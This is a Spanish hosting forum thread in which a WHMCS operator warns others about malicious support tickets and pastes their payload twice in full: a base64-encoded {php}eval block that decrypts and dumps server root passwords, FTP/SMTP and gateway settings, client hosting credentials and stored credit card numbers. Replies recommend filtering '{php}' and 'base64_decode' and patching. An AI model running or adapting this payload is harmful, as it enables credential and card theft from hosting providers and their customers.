Autor Tema: Email de hacker para whmcs. (Leído 1265 veces)

perrin · « **en:** Febrero 19, 2012, 07:01 »

Hola Amigos... les envio este email que me llega de vez en cuando a mi sistema de whmcs.

alguno de ustedes le ha pasado lo mismo...
cada vez que me llega bloqueo la IP... pero despues de un tiempo envian denuevo de otras IP.

saludos espero respuesta.. y tambien cuidado con esos emails..

estoy adjuntando una imagen para que puedan verlo... y comentar.
saludos
su amigo perrin...

leandro06 · « **Respuesta #1 en:** Febrero 19, 2012, 09:31 »

probastes decodificarlo?

esta compilado en base64 ese codigo, intenta copiarlo asi te lo tradusco.

fanhost · « **Respuesta #2 en:** Febrero 19, 2012, 12:19 »

Hola perrín:

Tengo una solución para evitarlo, te paso 2 enlaces a otro post de este mismo foro donde ya está la solución.

http://www.hostingfaq.es/paneles-de-control/urgente-he-recibido-un-ticket-raro-en-whmcs/msg73445/#msg73445

http://www.hostingfaq.es/paneles-de-control/urgente-he-recibido-un-ticket-raro-en-whmcs/msg73456/#msg73456

En ambas se explica 'básicamente' lo mismo. Son medidas de seguridad, espero te sirvan.

perrin · « **Respuesta #3 en:** Febrero 19, 2012, 15:29 »

Gracias e realizado... el control de span que menciona los enlaces... pero sabes de donde viene eso, que es?

?

saludos..

perrin · « **Respuesta #4 en:** Febrero 19, 2012, 15:33 »

leandro... te lo paso...
cuidado amigos este es el codigo que envian....

{php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBI T1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbGVyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2WydyZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGRlY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmFsdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkcmVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uIHdoZXJlIHNldHRpb mc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYWNrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGluZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3IgIHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciAgc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJHZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFBheW1lbnQgZ2F0ZXdheSAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCiRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIHRibHBheW1lbnRnYXRld2F5cyIpOw0Kd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQoNCiRnYXRld2F5ID0gJHZbJ2dhdGV3YXknXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9ICR2Wyd2YWx1ZSddOw0KDQ okdGV4dD0kdGV4dC4iJGdhdGV3YXl8JHNldHRpbmd8JHZhbHVlXHJcbiI7DQoNCg0KfQ0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFBheW1lbnQgZ2F0ZXdheSAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkNCgkJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIENsaWVudCBSMDB0cyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCiAkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxob3N0aW5nIHdoZXJlICh1c2VybmFtZSA9ICdyb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIHVzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhdG9yJykgYW5kIGRvbWFpbnN0YXR1cz0nQWN0aXZlJyIpOw0KDQogDQogICAgd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQogICAkdGV4dD0kdGV4dC4iXHJcbkRvbWFpbiAiLiR2Wydkb21haW4nXS4iXHJcbklQICIuJHZbJ2RlZGljYXRlZGlwJ10uIlxyXG5Vc2VybmFtZSAiLiR2Wyd1c2VybmFtZSddLiJcclxuUGFzc3dvcmQgIi5kZWNyeXB0ICgkdlsncGFzc3dvcmQnXSwgJGNjX2VuY3J5cHRpb25faGFzaCkuIlxyXG5Eb21haW5zdGF0dXMiLiR2Wydkb21haW5zdGF0dXMnXS4iXHJcbiI7DQogICAgfQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyM jIyMjIyMjIyMjIyMjIyBDbGllbnQgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbnQgSE9TVCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCiAkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxob3N0aW5nIHdoZXJlIGRvbWFpbnN0YXR1cz0nQWN0aXZlJyIpOw0KDQogDQogICAgd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQoJaWYgKCgkdlsndXNlcm5hbWUnXSApIGFuZCAoJHZbJ3Bhc3N3b3JkJ10pKSB7DQogICAkdGV4dD0kdGV4dC4iXHJcbkRvbWFpbiAiLiR2Wydkb21haW4nXS4iXHJcbklQICIuJHZbJ2RlZGljYXRlZGlwJ10uIlxyXG5Vc2VybmFtZSAiLiR2Wyd1c2VybmFtZSddLiJcclxuUGFzc3dvcmQgIi5kZWNyeXB0ICgkdlsncGFzc3dvcmQnXSwgJGNjX2VuY3J5cHRpb25faGFzaCkuIlxyXG5Eb21haW5zdGF0dXMiLiR2Wydkb21haW5zdGF0dXMnXS4iXHJcbiI7DQogICAgfQ0KCX0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbnQgQ0MgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJJHF1 ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gYHRibGNsaWVudHNgIFdIRVJFIGNhcmR0eXBlIDw+ICcnIG9yZGVyIGJ5IGlzc3VlbnVtYmVyIGRlc2MiKTsNCg0KCQ0Kd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQokY2NoYXNoID0gbWQ1KCAkY2NfZW5jcnlwdGlvbl9oYXNoLiR2WycwJ10pOw0KJHM9ICBteXNxbF9xdWVyeSgic2VsZWN0IGNhcmR0eXBlLEFFU19ERUNSWVBUKGNhcmRudW0sJ3skY2NoYXNofScpIGFzIGNhcmRudW0sQUVTX0RFQ1JZUFQoZXhwZGF0ZSwneyRjY2hhc2h9JykgYXMgZXhwZGF0ZSxBRVNfREVDUllQVChpc3N1ZW51bWJlciwneyRjY2hhc2h9JykgYXMgaXNzdWVudW1iZXIsQUVTX0RFQ1JZUFQoc3RhcnRkYXRlLCd7JGNjaGFzaH0nKSBhcyBzdGFydGRhdGUsY291bnRyeSxlbWFpbCxmaXJzdG5hbWUsbGFzdG5hbWUsYWRkcmVzczEsY2l0eSxzdGF0ZSxwb3N0Y29kZSxwaG9uZW51bWJlciAgRlJPTSBgdGJsY2xpZW50c2Agd2hlcmUgaWQ9JyIuJHZbJzAnXS4iJyIgKTsNCg0KJGNvdW50cnkgPSAkdlsnY291bnRyeSddOw0KJGVtYWlsID0gJHZbJ2VtYWlsJ107DQoNCiRmaXJzdG5hbWUgPSAkdlsnZmlyc3RuYW1lJ107DQokbGFzdG5hbWUgPSAkdlsnbGFzdG5hbWUnXTsNCiRhZGRyZXNzMSA9ICR2WydhZGRyZXNzMSddOw0KJGNpdHkgPSAkdlsnY2l0eSddOw0KJHN0YXRlID0gJHZbJ3N0YXRlJ107DQokcG9zdGNvZGUgPSAkdlsncG9zdGNvZGUnXTsNC iRwaG9uZW51bWJlciA9ICR2WydwaG9uZW51bWJlciddOw0KDQokdjI9bXlzcWxfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLiR2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XS4iICRmaXJzdG5hbWUgJGxhc3RuYW1lIH4gJGFkZHJlc3MxOiRjaXR5OiRzdGF0ZTokcG9zdGNvZGU6JHBob25lbnVtYmVyICAgJGNvdW50cnkgJGVtYWlsXHJcbiI7DQp9DQoNCg0KICAgDQogDQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIENsaWVudCBDQyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkNCgllY2hvKCR0ZXh0KTs='));exit;{/php}
Prioridad: Medium
---
{php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy BIT1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbGVyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2WydyZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGRlY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmFsdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkcmVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uIHdoZXJlIHNldHR pbmc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYWNrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGluZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3IgIHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciAgc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJHZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFBheW1lbnQgZ2F0ZXdheSAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCiRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIHRibHBheW1lbnRnYXRld2F5cyIpOw0Kd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQoNCiRnYXRld2F5ID0gJHZbJ2dhdGV3YXknXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9ICR2Wyd2YWx1ZSddOw0K DQokdGV4dD0kdGV4dC4iJGdhdGV3YXl8JHNldHRpbmd8JHZhbHVlXHJcbiI7DQoNCg0KfQ0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFBheW1lbnQgZ2F0ZXdheSAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkNCgkJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIENsaWVudCBSMDB0cyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCiAkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxob3N0aW5nIHdoZXJlICh1c2VybmFtZSA9ICdyb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIHVzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhdG9yJykgYW5kIGRvbWFpbnN0YXR1cz0nQWN0aXZlJyIpOw0KDQogDQogICAgd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQogICAkdGV4dD0kdGV4dC4iXHJcbkRvbWFpbiAiLiR2Wydkb21haW4nXS4iXHJcbklQICIuJHZbJ2RlZGljYXRlZGlwJ10uIlxyXG5Vc2VybmFtZSAiLiR2Wyd1c2VybmFtZSddLiJcclxuUGFzc3dvcmQgIi5kZWNyeXB0ICgkdlsncGFzc3dvcmQnXSwgJGNjX2VuY3J5cHRpb25faGFzaCkuIlxyXG5Eb21haW5zdGF0dXMiLiR2Wydkb21haW5zdGF0dXMnXS4iXHJcbiI7DQogICAgfQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjI yMjIyMjIyMjIyMjIyMjIyBDbGllbnQgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbnQgSE9TVCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCiAkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxob3N0aW5nIHdoZXJlIGRvbWFpbnN0YXR1cz0nQWN0aXZlJyIpOw0KDQogDQogICAgd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQoJaWYgKCgkdlsndXNlcm5hbWUnXSApIGFuZCAoJHZbJ3Bhc3N3b3JkJ10pKSB7DQogICAkdGV4dD0kdGV4dC4iXHJcbkRvbWFpbiAiLiR2Wydkb21haW4nXS4iXHJcbklQICIuJHZbJ2RlZGljYXRlZGlwJ10uIlxyXG5Vc2VybmFtZSAiLiR2Wyd1c2VybmFtZSddLiJcclxuUGFzc3dvcmQgIi5kZWNyeXB0ICgkdlsncGFzc3dvcmQnXSwgJGNjX2VuY3J5cHRpb25faGFzaCkuIlxyXG5Eb21haW5zdGF0dXMiLiR2Wydkb21haW5zdGF0dXMnXS4iXHJcbiI7DQogICAgfQ0KCX0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbnQgQ0MgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJJH F1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gYHRibGNsaWVudHNgIFdIRVJFIGNhcmR0eXBlIDw+ICcnIG9yZGVyIGJ5IGlzc3VlbnVtYmVyIGRlc2MiKTsNCg0KCQ0Kd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQokY2NoYXNoID0gbWQ1KCAkY2NfZW5jcnlwdGlvbl9oYXNoLiR2WycwJ10pOw0KJHM9ICBteXNxbF9xdWVyeSgic2VsZWN0IGNhcmR0eXBlLEFFU19ERUNSWVBUKGNhcmRudW0sJ3skY2NoYXNofScpIGFzIGNhcmRudW0sQUVTX0RFQ1JZUFQoZXhwZGF0ZSwneyRjY2hhc2h9JykgYXMgZXhwZGF0ZSxBRVNfREVDUllQVChpc3N1ZW51bWJlciwneyRjY2hhc2h9JykgYXMgaXNzdWVudW1iZXIsQUVTX0RFQ1JZUFQoc3RhcnRkYXRlLCd7JGNjaGFzaH0nKSBhcyBzdGFydGRhdGUsY291bnRyeSxlbWFpbCxmaXJzdG5hbWUsbGFzdG5hbWUsYWRkcmVzczEsY2l0eSxzdGF0ZSxwb3N0Y29kZSxwaG9uZW51bWJlciAgRlJPTSBgdGJsY2xpZW50c2Agd2hlcmUgaWQ9JyIuJHZbJzAnXS4iJyIgKTsNCg0KJGNvdW50cnkgPSAkdlsnY291bnRyeSddOw0KJGVtYWlsID0gJHZbJ2VtYWlsJ107DQoNCiRmaXJzdG5hbWUgPSAkdlsnZmlyc3RuYW1lJ107DQokbGFzdG5hbWUgPSAkdlsnbGFzdG5hbWUnXTsNCiRhZGRyZXNzMSA9ICR2WydhZGRyZXNzMSddOw0KJGNpdHkgPSAkdlsnY2l0eSddOw0KJHN0YXRlID0gJHZbJ3N0YXRlJ107DQokcG9zdGNvZGUgPSAkdlsncG9zdGNvZGUnXTs NCiRwaG9uZW51bWJlciA9ICR2WydwaG9uZW51bWJlciddOw0KDQokdjI9bXlzcWxfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLiR2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XS4iICRmaXJzdG5hbWUgJGxhc3RuYW1lIH4gJGFkZHJlc3MxOiRjaXR5OiRzdGF0ZTokcG9zdGNvZGU6JHBob25lbnVtYmVyICAgJGNvdW50cnkgJGVtYWlsXHJcbiI7DQp9DQoNCg0KICAgDQogDQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIENsaWVudCBDQyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkNCgllY2hvKCR0ZXh0KTs='));exit;{/php}

fanhost · « **Respuesta #5 en:** Febrero 19, 2012, 15:38 »

Buenas perrín,

Ese código lo envía un hacker (es código encriptado), con el fin de obtener información o simplemente 'boicotear' el WHMCS. WHMCS para utilizar el PHP, emplea el {PHP} y es por ello que todas las cadenas de intentos hack que envían son así.

Las soluciones pensadas serían bloqueo por e-mail, por IP... (no sería definitivo, por eso no se menciona en el otro hilo). Esa solución que te comentaba es la que más puede proteger, ya que bloqueando tanto el {PHP} como el base64_decode, se bloquean las partes más importantes del código, y lo anulan.

Saludos, espero te haya servido la explicación

atlanticadigital.net · « **Respuesta #6 en:** Febrero 19, 2012, 15:49 »

Hace un tiempo ya whmcs saco un parche para evitar que este codigo genere problemas en el sistema.
Podes boquear estos mails siguiendo los pasos que te indicaron. Sencillamente bloquea en la cadena de caracteres base64_decoded por ejemplo y listo. No te llegan mas este tipo de tickets.

Saludos.

leandro06 · « **Respuesta #7 en:** Febrero 20, 2012, 01:01 »

Que HDP, es un codigo excelente ese, es un script para cambiar los datos del configuration.php pero hay varios errores que impiden que eso suceda, si ese codigo hubiera estado bien hecho, hubieras perdido los datos de tu WHMCS.

Citar

EDITADO: No demos ideas.

Aca esta el codigo.

fanhost · « **Respuesta #8 en:** Febrero 20, 2012, 01:05 »

No creo que el código hubiera hecho efecto, no al menos teniendo el parche que sacaron (que a estas alturas quien no lo tenga es algo masoca...).

Quien no tenga la v5, creo que debería actualizar, al igual que aplicar el control SPAM. Ambas son muy recomendables

perrin · « **Respuesta #9 en:** Febrero 20, 2012, 17:30 »

Hola Amigos hize lo que me comentaron bloque en el control de span... sin embargo hoy me entro nuevamente ese mensaje...

les envió la captura como estoy bloqueando en el control antispam..
díganme si lo estoy haciendo bien...

gracias espero sus respuestas.
su amigo perrin

atlanticadigital.net · « **Respuesta #10 en:** Febrero 20, 2012, 17:33 »

Segun la imagen estas bloqueando asuntos.
Para que funcione bien tenes que bloquear Frases.

Saludos.

fanhost · « **Respuesta #11 en:** Febrero 20, 2012, 17:34 »

La parte que muestras del Control AntiSpam está bien, pero falta saber si está completa.

No bloquees solamente el Subject (Asunto), sino también el Phrases (que equivale al mensaje / contenido).

No estaría de más, añadir en emails bloqueados el que te salga con cada mensaje spam, ya que la mayoría de spam que he visto sobre WHMCS lo realiza con el mismo e-mail.

Saludos cordiales,
Kevin

leandro06 · « **Respuesta #12 en:** Febrero 20, 2012, 18:07 »

mmm yo tanto nose, lo mio es el Diseño Web y el MYSQL no el WHMCS en sí, pero lo unico que se, es que creo, que lo que quieren es perfeccionar ese codigo (basicamente el codigo que mandastes al principio del post, tenia en total 12 errores de los cuales 3 eran sumamente grandes, razon por la cual, no surgió efecto, pero si lo areglan, yo te puedo asegurar que nisiquiera ese parchesito de WHMCS te va a salvar.

fanhost · « **Respuesta #13 en:** Febrero 20, 2012, 18:09 »

Si aplica el filtro del que hablabamos, las partes filtradas harán que el total mensaje se anule.

Ahora mismo no sé si con ese filtro de evita crear el ticket, o si simplemente pierde fuerza, pero yo creo que cualquier campo de entrada en WHMCS debería estar con filtro para no poder introducir ciertos parámetros como el PHP o BASE64_DECODE...

Alexito · « **Respuesta #14 en:** Febrero 24, 2012, 01:59 »

En mi opinion yo diria que no permitieran esos codigos asi lo podria optener otra persona y mas aun ya esta decodificado =\ xD saludos.

Autor Tema: Email de hacker para whmcs. (Leído 1265 veces)

perrin

Email de hacker para whmcs.

leandro06

Re:Email de hacker para whmcs.

fanhost

Re:Email de hacker para whmcs.

perrin

Re:Email de hacker para whmcs.

